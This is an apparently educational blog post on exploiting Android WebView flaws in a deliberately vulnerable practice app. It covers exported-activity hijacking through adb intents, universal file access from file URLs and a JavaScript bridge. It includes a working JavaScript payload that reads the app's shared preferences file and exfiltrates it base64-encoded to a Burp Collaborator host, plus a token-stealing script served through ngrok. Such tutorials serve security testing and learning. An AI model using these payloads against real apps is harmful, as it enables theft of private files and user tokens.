Mobis3c
Published in

Mobis3c

Exploiting Android WebView Vulnerabilities

What is WebView?

The WebView class is an extension of Android's View class that allows you to display web pages as a part of your activity layout. It does not include any features of a fully developed web browser, such as navigation controls or an address bar. All that WebView does, by default, is show a web page.

Twitter using webview to load the site.

For testing, we will be using the vulnerable webview application to learn how to manually exploit the webview’s in android application. Credentials for the login is username:vuln and password:webview (in case if we need.)

vulnerable WebView app

WebViews are Exported

Before getting into the vulnerability, we need to make sure that WebViews are part of our target application.

Since WebViews are part of the activities in an application, we need to de-compile an apk to go through AndroidManifest.xml file and the application’s Activities to check for the presence of vulnerable WebView.

Let us first load our application into the Jadx de-compiler to analyze the manifest and activities.

decompiler

Now, we will see which are the components that are exported. we can conclude that a component is exported in 2 ways.

  • If component explicitly declares the “exported=true” attribute
  • If the component has intent filters & no “exported=false” attribute
activities exported

some of the components SupportWebView, RegistrationWebView are explicitly exported and MainActivity is exported by mentioning intent filters by which we can confirm that WebViews are being used by the application.

confirming with

We can see that the function loadWebView,it is loading the url by getting the string from intent.

webview code

So this behavior can be exploited by third party applications by sending an intent to this component with a url string and the target application will accept and execute as this component has been exported. i.e., third party application have access to webview component in target application.

Exploitation

We will use ADB to send an intent to the component and this intent will open a malicious webpage provided by the attacker within the context of the application.

adb shell am start -n componentname --es string "domain.com"

adb shell to start unique shell on a device, am (activity manager) start, -n name of the component, — es extra string followed by the url.

So our adb cmd will look like as follows:

adb shell am start -n com.tmh.vulnwebview/.RegistrationWebView --es reg_url "https://3kal.medium.com"
sending intent to webviews
webview loaded with attacker url

NOTE: The above way works only if the component is directly exported and this doesn’t work for component exported by intent filter.

setAllowUniversalAccessFromFileURLs enabled for WebView

Another setting that the developer can configure is allowing JavaScript running within the context of file scheme URL to access content from any origin including other file scheme URLs.

This setting removes all same origin policy restrictions & allows the webview to make requests to the web from the file which is normally not possible. i.e., Attacker can read local files using java script and send them across the web to a attacker controlled domain.

If the WebView is exported, this behavior can be very dangerous because it can allow the attacker to read arbitrary files which may be private to the application.

setAllowUniversalAccessFromFileURLs

Exploitation

Now let us see how to exploit this setting which has been used in the above application.

setAllowUniversalAccessFromFileURLs

Now, let us create the exploit for the vulnerability in java script as discussed in the vulnerability details.

I have used my burp collaborator link to get the content, you can use whichever is handy for you.

<script>
var url = 'file:///data/data/com.tmh.vulnwebview/shared_prefs/MainActivity.xml'; //local file
function load(url) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
fetch('https://8ktm71h4wjnqo72wgqbzvnr7jypodd.burpcollaborator.net/?exfiltrated=' + btoa(xhr.responseText)); //send b64 encoded file to attacker
}
}
xhr.open('GET', url, true);
xhr.send('');
}
load(url)
</script>
Arbitrary file read exploit

Add the above code to sauafu.html and move the file to the sdcard using adb.

push exploit into device

Exploit loads the content of the local file and returns it to the attacker url.

Now run the intent with exploit file.

adb shell am start -n com.tmh.vulnwebview/.RegistrationWebView --es reg_url "file:///sdcard/sauafu.html"
intent launch
empty registration page

Now we should have received file contents encoded in base 64 in the burp collaborator or whatever you used.

exploit poc

We can see the decoded contents of the file which was received in base 64 encoded on the right window box.

JavaScript Enabled with Interface for WebView

Developers can enable java script in the webview by adding this configuration

webView.getSettings().setJavaScriptEnabled(true);

Adding this configuration creates an interface between the webpage’s java script and the client side java code of the application. i.e., the web page’s java script can access and inject java code into the application.

webView.addJavascriptInterface(new WebAppInterface(this), "Android");  

if this activity is exported, this can be dangerous and allows an attacker to carry out many attacks including XSS and stealing tokens from the application.

Exploitation

For Exploitation of this scenario, we cannot make use of the same web View as above since it doesn’t make use of interface. Hence, we will use some other webView which has used the interface.

support webview

we can use support webview as you can see that java script has been enabled along with the use of the interface with the name Android.

interface declaration
<script type="text/javascript">
document.write("token: " + Android.getUserToken());
</script>

This script writes the token by generating from the getUserToken() Method from the Android object which was the name of the interface.

Host this script from the apache server and connect port 80 to ngrok to get https link (http links cannot be used).

sudo service apache2 start
./ngrok http 80
and use https ngrok linkadb shell am start -n com.tmh.vulnwebview/.Supportwebview --es support_url "https://8d95c0fe086f.ngrok.io/token.html"
intent
token stealing

We can show XSS alert just by replacing the document.write line in the above javascript code with your favorite xss payload.

<script type="text/javascript">
alert("kal");
</script>
XSS Alert.

We have covered 4 Vulnerabilities related to WebViews

  • Exported WebView (WebView Hijacking)
  • Universal File access from file is enabled for WebView (File Theft)
  • Use of setJavaScript Enabled(XSS)
  • Javascript Interface (token stealing)

Note: Most was taken as is from Farah Hawa’s Video in youtube. All credits goes to her, if you like the content then please watch the video and like it.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store